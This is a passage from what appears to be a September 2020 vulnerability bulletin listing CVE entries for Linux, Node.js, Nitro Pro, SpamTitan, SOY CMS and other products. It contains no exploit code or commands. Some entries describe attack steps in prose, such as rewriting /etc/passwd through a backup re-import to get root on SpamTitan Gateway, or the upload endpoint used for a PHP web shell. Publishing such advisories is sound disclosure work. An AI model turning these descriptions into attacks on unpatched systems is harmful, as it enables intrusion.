    A flaw was found in the Linux Kernel before 5.8-rc1 in the prctl() function, where it can be used to enable indirect branch speculation after it has been disabled. This call incorrectly reports it as being 'force disabled' when it is not and opens the system to Spectre v2 attacks. The highest threat from this vulnerability is to confidentiality. 2020-09-16 not yet calculated CVE-2020-10768
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel's implementation of the invert video code on VGA consoles when a local attacker attempts to resize the console, calling an ioctl VT_RESIZE, which causes an out-of-bounds write to occur. This flaw allows a local user with access to the VGA console to crash the system, potentially escalating their privileges on the system. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 not yet calculated CVE-2020-14331
    MISC
    MISC
    MISC
    linux -- linux_kernel
     
    A memory disclosure flaw was found in the Linux kernel's ethernet drivers, in the way it read data from the EEPROM of the device. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-14304
    MISC
    CONFIRM
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel in versions from 2.2.3 through 5.9.rc5. When changing screen size, an out-of-bounds memory write can occur leading to memory corruption or a denial of service. The highest threat from this vulnerability is to system availability. 2020-09-18 not yet calculated CVE-2020-14390
    MISC
    MISC
    MISC
    linux -- linux_kernel
     
    A memory out-of-bounds read flaw was found in the Linux kernel before 5.9-rc2 with the ext3/ext4 file system, in the way it accesses a directory with broken indexing. This flaw allows a local user to crash the system if the directory exists. The highest threat from this vulnerability is to system availability. 2020-09-15 not yet calculated CVE-2020-14314
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
    A logic bug flaw was found in Linux kernel before 5.8-rc1 in the implementation of SSBD. A bug in the logic handling allows an attacker with a local account to disable SSBD protection during a context switch when additional speculative execution mitigations are in place. This issue was introduced when the per task/process conditional STIBP switching was added on top of the existing SSBD switching. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-10766
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel before 5.8-rc1 in the implementation of the Enhanced IBPB (Indirect Branch Prediction Barrier). The IBPB mitigation will be disabled when STIBP is not available or when the Enhanced Indirect Branch Restricted Speculation (IBRS) is available. This flaw allows a local attacker to perform a Spectre V2 style attack when this configuration is active. The highest threat from this vulnerability is to confidentiality. 2020-09-15 not yet calculated CVE-2020-10767
    CONFIRM
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux Kernel before 5.8-rc6 in the ZRAM kernel module, where a user with a local account and the ability to read the /sys/class/zram-control/hot_add file can create ZRAM device nodes in the /dev/ directory. This read allocates kernel memory and is not accounted for a user that triggers the creation of that ZRAM device. With this vulnerability, continually reading the device may consume a large amount of system memory and cause the Out-of-Memory (OOM) killer to activate and terminate random userspace processes, possibly making the system inoperable. 2020-09-16 not yet calculated CVE-2020-10781
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel before 5.9-rc4. Memory corruption can be exploited to gain root privileges from unprivileged processes. The highest threat from this vulnerability is to data confidentiality and integrity. 2020-09-16 not yet calculated CVE-2020-14386
    CONFIRM
    MISC
    MISC
    linux -- linux_kernel
     
    A flaw was found in the Linux kernel before 5.9-rc4. A failure of the file system metadata validator in XFS can cause an inode with a valid, user-creatable extended attribute to be flagged as corrupt. This can lead to the filesystem being shutdown, or otherwise rendered inaccessible until it is remounted, leading to a denial of service. The highest threat from this vulnerability is to system availability. 2020-09-15 not yet calculated CVE-2020-14385
    CONFIRM
    MISC
    london_trust_media -- private_internet_access_vpn_client_for_linux
     
    A vulnerability in the Private Internet Access (PIA) VPN Client for Linux 1.5 through 2.3+ allows remote attackers to bypass an intended VPN kill switch mechanism and read sensitive information via intercepting network traffic. Since 1.5, PIA has supported a "split tunnel" OpenVPN bypass option. The PIA killswitch & associated iptables firewall is designed to protect you while using the Internet. When the kill switch is configured to block all inbound and outbound network traffic, privileged applications can continue sending & receiving network traffic if net.ipv4.ip_forward has been enabled in the system kernel parameters. For example, a Docker container running on a host with the VPN turned off, and the kill switch turned on, can continue using the internet, leaking the host IP (CWE 200). In PIA 2.4.0+, policy-based routing is enabled by default and is used to direct all forwarded packets to the VPN interface automatically. 2020-09-14 not yet calculated CVE-2020-15590
    MISC
    MISC
    MISC
    mediawiki -- mediawiki
     
    The ScratchSig extension for MediaWiki before version 1.0.1 allows stored Cross-Site Scripting. By using a <script> tag inside a <scratchsig> tag, attackers with edit permission can execute scripts in visitors' browsers. With the MediaWiki JavaScript API, this can potentially lead to privilege escalation and/or account takeover. This has been patched in release 1.0.1. This has already been deployed to all Scratch Wikis. No workarounds exist other than disabling the extension completely. 2020-09-15 not yet calculated CVE-2020-15179
    MISC
    CONFIRM
    micro_focus -- operation_agent
     
    Unauthorized escalation of local privileges vulnerability on Micro Focus Operation Agent, affecting all versions prior to version 12.11. The vulnerability could be exploited to escalate the local privileges and gain root access on the system. 2020-09-18 not yet calculated CVE-2020-11861
    MISC
    misp -- misp
     
    An issue was discovered in MISP before 2.4.132. It can perform an unwanted action because of a POST operation on a form that is not linked to the login page. 2020-09-18 not yet calculated CVE-2020-25766
    MISC
    MISC
    nextcloud -- desktop_client
     
    A cleartext storage of sensitive information in Nextcloud Desktop Client 2.6.4 gave away information about used proxies and their authentication credentials. 2020-09-18 not yet calculated CVE-2020-8225
    MISC
    MISC
    nifty -- project_management_web_application
     
    Nifty Project Management Web Application 2020-08-26 allows XSS, via Add Task, that is rendered upon a Project Home visit. 2020-09-15 not yet calculated CVE-2020-25071
    MISC
    MISC
    nitro_software -- nitro_pro
     
    An exploitable code execution vulnerability exists in the JPEG2000 Stripe Decoding functionality of Nitro Software, Inc.'s Nitro Pro 13.13.2.242 when decoding sub-samples. While initializing tiles with sub-sample data, the application can miscalculate a pointer for the stripes in the tile, which allows the decoder to write out of bounds and cause memory corruption. This can result in code execution. A specially crafted image can be embedded inside a PDF and loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6112
    MISC
    nitro_software -- nitro_pro
     
    An exploitable vulnerability exists in the object stream parsing functionality of Nitro Software, Inc.'s Nitro Pro 13.13.2.242 when updating its cross-reference table. When processing an object stream from a PDF document, the application will perform a calculation in order to allocate memory for the list of indirect objects. Due to an error when calculating this size, an integer overflow may occur which can result in an undersized buffer being allocated. Later when initializing this buffer, the application can write outside its bounds which can cause a memory corruption that can lead to code execution. A specially crafted document can be delivered to a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6113
    MISC
    nitro_software -- nitro_pro
     
    An exploitable vulnerability exists in the cross-reference table repairing functionality of Nitro Software, Inc.'s Nitro Pro 13.13.2.242. While searching for an object identifier in a malformed document that is missing from the cross-reference table, the application will save a reference to the object's cross-reference table entry inside a stack variable. If the referenced object identifier is not found, the application may resize the cross-reference table which can change the scope of its entry. Later when the application tries to reference the cross-reference entry via the stack variable, the application will access memory belonging to the recently freed table, causing a use-after-free condition. A specially crafted document can be delivered by an attacker and loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6115
    MISC
    nitro_software -- nitro_pro
     
    An arbitrary code execution vulnerability exists in the rendering functionality of Nitro Software, Inc.'s Nitro Pro 13.13.2.242. When drawing the contents of a page using colors from an indexed colorspace, the application can miscalculate the size of a buffer when allocating space for its colors. When using this allocated buffer, the application can write outside its bounds and cause memory corruption which can lead to code execution. A specially crafted document must be loaded by a victim in order to trigger this vulnerability. 2020-09-17 not yet calculated CVE-2020-6116
    MISC
    node.js -- node.js
     
    Node.js < 14.11.0 is vulnerable to HTTP denial of service (DoS) attacks based on delayed requests submission which can make the server unable to accept new connections. 2020-09-18 not yet calculated CVE-2020-8251
    MISC
    MISC
    node.js -- node.js
     
    The implementation of realpath in libuv < 10.22.1, < 12.18.4, and < 14.9.0 used within Node.js incorrectly determined the buffer size which can result in a buffer overflow if the resolved path is longer than 256 bytes. 2020-09-18 not yet calculated CVE-2020-8252
    MISC
    MISC
    node.js -- node.js
     
    Node.js < 12.18.4 and < 14.11 can be exploited to perform HTTP desync attacks and deliver malicious payloads to unsuspecting users. The payloads can be crafted by an attacker to hijack user sessions, poison cookies, perform clickjacking, and a multitude of other attacks depending on the architecture of the underlying system. The attack was possible due to a bug in the processing of carriage-return symbols in HTTP header names. 2020-09-18 not yet calculated CVE-2020-8201
    MISC
    MISC
    nvidia -- geforce_now
     
    NVIDIA GeForce NOW, versions prior to 2.0.23 on Windows and macOS, contains a vulnerability in the desktop application software that includes sensitive information as part of a URL, which may lead to information disclosure. 2020-09-18 not yet calculated CVE-2020-5975
    CONFIRM
    nvidia -- geforce_now
     
    NVIDIA GeForce NOW, versions prior to 2.0.23 (Windows, macOS) and versions prior to 5.31 (Android, Shield TV), contains a vulnerability in the application software where the network test component transmits sensitive information insecurely, which may lead to information disclosure. 2020-09-18 not yet calculated CVE-2020-5976
    CONFIRM
    objective_systems -- objective_open_cbor
     
    A memory corruption vulnerability in Objective Open CBOR Run-time (oocborrt) in versions before 2020-08-12 could allow an attacker to execute code via crafted Concise Binary Object Representation (CBOR) input to the cbor2json decoder. An uncaught error while decoding CBOR Major Type 3 text strings leads to the use of an attacker-controllable uninitialized stack value. This can be used to modify memory, causing a crash or potentially exploitable heap corruption. 2020-09-17 not yet calculated CVE-2020-24753
    MISC
    MISC
    ozeki -- ng_sms_gateway
     
    An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The RSS To SMS module processes XML files in an unsafe manner. This opens the application to an XML External Entity attack that can be used to perform SSRF or read arbitrary local files. 2020-09-18 not yet calculated CVE-2020-14029
    MISC
    MISC
    ozeki -- ng_sms_gateway
     
    An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The ASP.net SMS module can be used to read and validate the source code of ASP files. By altering the path, it can be made to read any file on the Operating System, usually with NT AUTHORITY\SYSTEM privileges. 2020-09-18 not yet calculated CVE-2020-14021
    MISC
    MISC
    MISC
    perl -- perl
     
    An issue was discovered in the DBI module through 1.643 for Perl. DBD::File drivers can open files from folders other than those specifically passed via the f_dir attribute in the data source name (DSN). NOTE: this issue exists because of an incomplete fix for CVE-2014-10401. 2020-09-16 not yet calculated CVE-2014-10402
    MISC
    perl -- perl
     
    An untrusted pointer dereference flaw was found in Perl-DBI < 1.643. A local attacker who is able to manipulate calls to dbd_db_login6_sv() could cause memory corruption, affecting the service's availability. 2020-09-16 not yet calculated CVE-2020-14392
    SUSE
    MISC
    MISC
    UBUNTU
    perl -- perl
     
    A buffer overflow was found in perl-DBI < 1.643 in DBI.xs. A local attacker who is able to supply a string longer than 300 characters could cause an out-of-bounds write, affecting the availability of the service or integrity of data. 2020-09-16 not yet calculated CVE-2020-14393
    SUSE
    MISC
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output used as a webpage that is served to other users. 2020-09-18 not yet calculated CVE-2020-14525
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an attacker to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. 2020-09-18 not yet calculated CVE-2020-16200
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. 2020-09-18 not yet calculated CVE-2020-16247
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. When an attacker claims to have a given identity, the software does not prove or insufficiently proves the claim is correct. 2020-09-18 not yet calculated CVE-2020-16198
    MISC
    philips -- clinical_collaboration_platform
     
    Philips Clinical Collaboration Platform, Versions 12.2.1 and prior. The product receives input or data, but it does not validate or incorrectly validates that the input has the properties required to process the data safely and correctly. 2020-09-18 not yet calculated CVE-2020-14506
    MISC
    postgresql -- postgresql
     
    The Windows installer for PostgreSQL 9.5 - 12 invokes system-provided executables that do not have fully-qualified paths. Executables in the directory where the installer loads or the current working directory take precedence over the intended executables. An attacker having permission to add files into one of those directories can use this to execute arbitrary code with the installer's administrative rights. 2020-09-16 not yet calculated CVE-2020-10733
    MISC
    MISC
    prestashop -- prestashop
     
    In PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker is able to inject JavaScript while using the contact form. The `message` field was incorrectly unescaped, possibly allowing attackers to execute arbitrary JavaScript in a victim's browser. 2020-09-15 not yet calculated CVE-2020-15178
    MISC
    CONFIRM
    MISC
    puppet -- puppet_enterprise
     
    Local registry credentials were included directly in the CD4PE deployment definition, which could expose these credentials to users who should not have access to them. This is resolved in Continuous Delivery for Puppet Enterprise 4.0.1. 2020-09-18 not yet calculated CVE-2020-7945
    MISC
    rad -- secflow-1v
     
    A vulnerability in the web-based management interface of RAD SecFlow-1v through 2020-05-21 could allow an authenticated attacker to upload a JavaScript file, with a stored XSS payload, that will remain stored in the system as an OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. This payload will execute each time a user opens an affected web page. This could be exploited in conjunction with CVE-2020-13259. 2020-09-17 not yet calculated CVE-2020-13260
    MISC
    MISC
    MISC
    rad -- secflow-1v
     
    A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. 2020-09-16 not yet calculated CVE-2020-13259
    MISC
    EXPLOIT-DB
    rapid7 -- appspider
     
    In AppSpider installer versions prior to 7.2.126, the AppSpider installer calls an executable which can be placed in the appropriate directory by an attacker with access to the local machine. This would prevent the installer from distinguishing between a valid executable called during an installation and any arbitrary code executable using the same file name. 2020-09-18 not yet calculated CVE-2020-7358
    MISC
    red_discord_bot -- act_module
     
    The Act module for Red Discord Bot before commit 6b9f3b86 is vulnerable to Remote Code Execution. With this exploit, Discord users can use specially crafted messages to perform destructive actions and/or access sensitive information. Unloading the Act module with `unload act` can render this exploit inaccessible. 2020-09-15 not yet calculated CVE-2020-15172
    MISC
    CONFIRM
    red_hat -- jboss_eap
     
    The issue appears to be that JBoss EAP 6.4.21 does not parse the field-name in accordance with RFC7230[1] as it returns a 200 instead of a 400. 2020-09-16 not yet calculated CVE-2020-1710
    MISC
    red_hat -- jboss_keycloak
     
    A flaw was found in all versions of Keycloak before 10.0.0, where the NodeJS adapter did not support the verify-token-audience. This flaw results in some users having access to sensitive information outside of their permissions. 2020-09-16 not yet calculated CVE-2020-1694
    MISC
    red_hat -- jboss_keycloak
     
    A vulnerability was found in Keycloak before 11.0.1 where a DoS attack is possible by sending twenty requests simultaneously to the specified Keycloak server, all with a Content-Length header value that exceeds the actual byte count of the request body. 2020-09-16 not yet calculated CVE-2020-10758
    MISC
    red_hat -- jboss_keycloak
     
    A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flaw allows an attacker to conduct cross-site scripting or further attacks. 2020-09-16 not yet calculated CVE-2020-10748
    MISC
    red_hat -- openshift_console
     
    A content spoofing vulnerability was found in the openshift/console 3.11 and 4.x. This flaw allows an attacker to craft a URL and inject arbitrary text onto the error page that appears to be from the OpenShift instance. This attack could potentially convince a user that the inserted text is legitimate. 2020-09-16 not yet calculated CVE-2020-10715
    MISC
    MISC
    red_hat -- qt_library
     
    Uncontrolled search path in the QT Library before 5.14.0, 5.12.7 and 5.9.10 may allow an authenticated user to potentially enable elevation of privilege via local access. 2020-09-14 not yet calculated CVE-2020-0570
    MISC
    resteasy -- resteasy
     
    A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality. 2020-09-18 not yet calculated CVE-2020-25633
    CONFIRM
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, clone can have a memory-safety issue upon a panic. 2020-09-19 not yet calculated CVE-2020-25794
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the InlineArray implementation, an unaligned reference may be generated for a type that has a large alignment requirement. 2020-09-19 not yet calculated CVE-2020-25796
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, insert_from can have a memory-safety issue upon a panic. 2020-09-19 not yet calculated CVE-2020-25795
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the linked-hash-map crate before 0.5.3 for Rust. It creates an uninitialized NonNull pointer, which violates a non-null constraint. 2020-09-14 not yet calculated CVE-2020-25573
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the rand_core crate before 0.4.2 for Rust. Casting of byte slices to integer slices mishandles alignment constraints. 2020-09-14 not yet calculated CVE-2020-25576
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with unit(). 2020-09-19 not yet calculated CVE-2020-25791
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with pair(). 2020-09-19 not yet calculated CVE-2020-25792
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the sized-chunks crate through 0.6.2 for Rust. In the Chunk implementation, the array size is not checked when constructed with From<InlineArray<A, T>>. 2020-09-19 not yet calculated CVE-2020-25793
    MISC
    MISC
    rust -- rust
     
    ** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in the failure crate through 0.1.5 for Rust. It has a type confusion flaw when downcasting. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-09-14 not yet calculated CVE-2020-25575
    MISC
    MISC
    rust -- rust
     
    An issue was discovered in the http crate before 0.1.20 for Rust. An integer overflow in HeaderMap::reserve() could result in denial of service (e.g., an infinite loop). 2020-09-14 not yet calculated CVE-2020-25574
    MISC
    MISC
    safervpn_for_windows -- safervpn_for_windows
     
    SaferVPN before 5.0.3.3 on Windows could allow low-privileged users to create or overwrite arbitrary files, which could cause a denial of service (DoS) condition, because a symlink from %LOCALAPPDATA%\SaferVPN\Log is followed. 2020-09-18 not yet calculated CVE-2020-25744
    MISC
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which could allow arbitrary code execution when an attacker builds a custom .PRJ file containing a malicious serialized buffer. 2020-09-16 not yet calculated CVE-2020-7528
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Transversal') vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place content in any unprotected folder on the target system using a crafted .RCZ file. 2020-09-16 not yet calculated CVE-2020-7529
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders. 2020-09-16 not yet calculated CVE-2020-7530
    MISC
    schneider_electric -- scadapack_7x_remote_connect
     
    A CWE-284 Improper Access Control vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user. 2020-09-16 not yet calculated CVE-2020-7531
    MISC
    schneider_electric -- scadapack_7x_security_administrator
     
    A CWE-502 Deserialization of Untrusted Data vulnerability exists in SCADAPack x70 Security Administrator (V1.2.0 and prior) which could allow arbitrary code execution when an attacker builds a custom .SDB file containing a malicious serialized buffer. 2020-09-16 not yet calculated CVE-2020-7532
    MISC
    solarwinds -- orion_platform
     
    Stored XSS (Cross-Site Scripting) exists in the SolarWinds Orion Platform before 2020.2.1 on multiple forms and pages. This vulnerability may lead to Information Disclosure and Escalation of Privileges (takeover of administrator account). 2020-09-17 not yet calculated CVE-2020-13169
    CONFIRM
    MISC
    sourcecodester -- online_course_registration
     
    A File Upload vulnerability in SourceCodester Online Course Registration v1.0 allows remote attackers to achieve Remote Code Execution (RCE) on the hosting webserver by uploading a crafted PHP web-shell that bypasses the image upload filters. An attack uses /Online%20Course%20Registration/my-profile.php with the POST parameter photo. 2020-09-15 not yet calculated CVE-2020-23828
    MISC
    MISC
    soycms -- soycms
     
    SoyCMS 3.0.2 and earlier is affected by Reflected Cross-Site Scripting (XSS) which leads to Remote Code Execution (RCE) from a known vulnerability. This allows remote attackers to force the administrator to edit files once the administrator loads a specially crafted webpage. 2020-09-17 not yet calculated CVE-2020-15183
    MISC
    CONFIRM
    MISC
    soycms -- soycms
     
    SOY CMS 3.0.2 and earlier is affected by Remote Code Execution (RCE) using Unrestricted File Upload. The Cross-Site Scripting (XSS) vulnerability that was used in CVE-2020-15183 can be used to increase impact by redirecting the administrator to access a specially crafted page. This vulnerability is caused by insecure configuration in elFinder. This is fixed in version 3.0.2.328. 2020-09-18 not yet calculated CVE-2020-15189
    MISC
    MISC
    MISC
    CONFIRM
    MISC
    soycms -- soycms
     
    SOY CMS 3.0.2.327 and earlier is affected by Unauthenticated Remote Code Execution (RCE). This allows remote attackers to execute any arbitrary code when the inquiry form feature is enabled by the service. The vulnerability is caused by unserializing the form without any restrictions. This was fixed in 3.0.2.328. 2020-09-18 not yet calculated CVE-2020-15188
    MISC
    MISC
    CONFIRM
    MISC
    soycms -- soycms
     
    The SOY Inquiry component of SOY CMS is affected by Cross-site Request Forgery (CSRF) and Remote Code Execution (RCE). The vulnerability affects versions 2.0.0.3 and earlier of SOY Inquiry. This allows remote attackers to force the administrator to edit files once the administrator loads a specially crafted webpage. An administrator must be logged in for exploitation to be possible. This issue is fixed in SOY Inquiry version 2.0.0.4 and included in SOY CMS 3.0.2.328. 2020-09-17 not yet calculated CVE-2020-15182
    MISC
    CONFIRM
    MISC
    spring -- spring_framework
     
    In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. 2020-09-19 not yet calculated CVE-2020-5421
    CONFIRM
    sqreen -- php_agent_daemon
     
    Lack of cryptographic signature verification in the Sqreen PHP agent daemon before 1.16.0 makes it easier for remote attackers to inject rules for execution inside the virtual machine. 2020-09-17 not yet calculated CVE-2020-25490
    CONFIRM
    sqreen -- pyminiracer
     
    A heap overflow in Sqreen PyMiniRacer (aka Python Mini Racer) before 0.3.0 allows remote attackers to potentially exploit heap corruption. 2020-09-17 not yet calculated CVE-2020-25489
    CONFIRM
    MISC
    suse -- multiple_products
     
    An Improper Access Control vulnerability in the configuration of salt of SUSE Linux Enterprise Module for SUSE Manager Server 4.1, SUSE Manager Proxy 4.0, SUSE Manager Retail Branch Server 4.0, SUSE Manager Server 3.2, SUSE Manager Server 4.0 allows local users to escalate to root on every system managed by SUSE Manager. On the managing node itself code can be executed as user salt, potentially allowing for escalation to root there. This issue affects: SUSE Linux Enterprise Module for SUSE Manager Server 4.1 google-gson versions prior to 2.8.5-3.4.3, httpcomponents-client-4.5.6-3.4.2, httpcomponents-. SUSE Manager Proxy 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Retail Branch Server 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Server 3.2 salt-netapi-client versions prior to 0.16.0-4.14.1, spacewalk-. SUSE Manager Server 4.0 release-notes-susemanager versions prior to 4.0.9-3.54.1. 2020-09-17 not yet calculated CVE-2020-8028
    CONFIRM
    sylabs -- singularity
     
    Sylabs Singularity through 3.6.2 has Insecure Permissions on temporary directories used in explicit and implicit container build operations, a different vulnerability than CVE-2020-25039. 2020-09-16 not yet calculated CVE-2020-25040
    MISC
    MISC
    sylabs -- singularity
     
    Sylabs Singularity 3.2.0 through 3.6.2 has Insecure Permissions on temporary directories used in fakeroot or user namespace container execution. 2020-09-16 not yet calculated CVE-2020-25039
    MISC
    MISC
    tibco_software -- multiple_products
     
    The Spotfire client component of TIBCO Software Inc.'s TIBCO Spotfire Analyst, TIBCO Spotfire Analytics Platform for AWS Marketplace, TIBCO Spotfire Desktop, and TIBCO Spotfire Server contains a vulnerability that theoretically allows a legitimate user to inject scripts. If executed by a victim authenticated to the affected system these scripts will be executed at the privileges of the victim. Affected releases are TIBCO Software Inc.'s TIBCO Spotfire Analyst: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, TIBCO Spotfire Analytics Platform for AWS Marketplace: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1, TIBCO Spotfire Desktop: versions 10.7.0, 10.8.0, 10.9.0, and 10.10.0, and TIBCO Spotfire Server: versions 10.7.0, 10.8.0, 10.8.1, 10.9.0, 10.10.0, and 10.10.1. 2020-09-15 not yet calculated CVE-2020-9416
    CONFIRM
    CONFIRM
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. imgproxy in plugins/af_proxy_http/init.php mishandles $_REQUEST["url"] in an error message. 2020-09-19 not yet calculated CVE-2020-25788
    MISC
    MISC
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. It does not validate all URLs before requesting them. 2020-09-19 not yet calculated CVE-2020-25787
    MISC
    MISC
    tiny -- tiny_rss
     
    An issue was discovered in Tiny Tiny RSS (aka tt-rss) before 2020-09-16. The cached_url feature mishandles JavaScript inside an SVG document. 2020-09-19 not yet calculated CVE-2020-25789
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. 2020-09-17 not yet calculated CVE-2020-11803
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. 2020-09-17 not yet calculated CVE-2020-11804
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. 2020-09-17 not yet calculated CVE-2020-11699
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. 2020-09-17 not yet calculated CVE-2020-11700
    MISC
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan
     
    An issue was discovered in Titan SpamTitan 7.07. Improper input sanitization of the parameter community on the page snmp-x.php would allow a remote attacker to inject commands into the file snmpd.conf that would allow executing commands on the target server. 2020-09-17 not yet calculated CVE-2020-11698
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan_gateway
     
    A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. This restricted shell can be bypassed after changing the properties of the user admin in the operating system file /etc/passwd. This file cannot be accessed through the restricted shell, but it can be modified by abusing the Backup/Import Backup functionality of the web interface. An authenticated attacker would be able to obtain the file /var/tmp/admin.passwd after executing a Backup operation. This file can be manually modified to change the GUID of the user to 0 (root) and change the restricted shell to a normal shell /bin/sh. After the modification is done, the file can be recompressed to a .tar.bz file and imported again via the Import Backup functionality. The properties of the admin user will be overwritten and a root shell will be granted to the user upon the next successful login. 2020-09-17 not yet calculated CVE-2020-24046
    MISC
    MISC
    MISC
    MISC
    titanhq -- spamtitan_gateway
     
    A sandbox escape issue was discovered in TitanHQ SpamTitan Gateway 7.07. It limits the admin user to a restricted shell, allowing execution of a small number of tools of the operating system. The restricted shell can be bypassed by presenting a fake vmware-tools ISO image to the guest virtual machine running SpamTitan Gateway. This ISO image should contain a valid Perl script at the vmware-freebsd-tools/vmware-tools-distrib/vmware-install.pl path. The fake ISO image will be mounted and the script vmware-install.pl will be executed with super-user privileges as soon as the hidden option to install VMware Tools is selected in the main menu of the restricted shell (option number 5). The contents of the script can be whatever the attacker wants, including a backdoor or similar. 2020-09-17 not yet calculated CVE-2020-24045
    MISC
    MISC
    MISC
    MISC
    trend_micro -- serverprotect
     
    A command injection vulnerability in Trend Micro ServerProtect for Linux 3.0 could allow an attacker to execute arbitrary code on an affected system. An attacker must first obtain admin/root privileges on the SPLX console to exploit this vulnerability. 2020-09-15 not yet calculated CVE-2020-24561
    N/A
    typeorm -- typeorm
     
    Prototype pollution vulnerability in the TypeORM package < 0.2.25 may allow attackers to add or modify Object properties leading to further denial of service or SQL injection attacks. 2020-09-18 not yet calculated CVE-2020-8158
    MISC
    ua-parser-js -- ua-parser-js
     
    The package ua-parser-js before 0.7.22 is vulnerable to Regular Expression Denial of Service (ReDoS) via the regex for Redmi Phones and Mi Pad Tablets UA. 2020-09-16 not yet calculated CVE-2020-7733
    CONFIRM
    CONFIRM
    CONFIRM
    CONFIRM
    vmware -- fusion
     
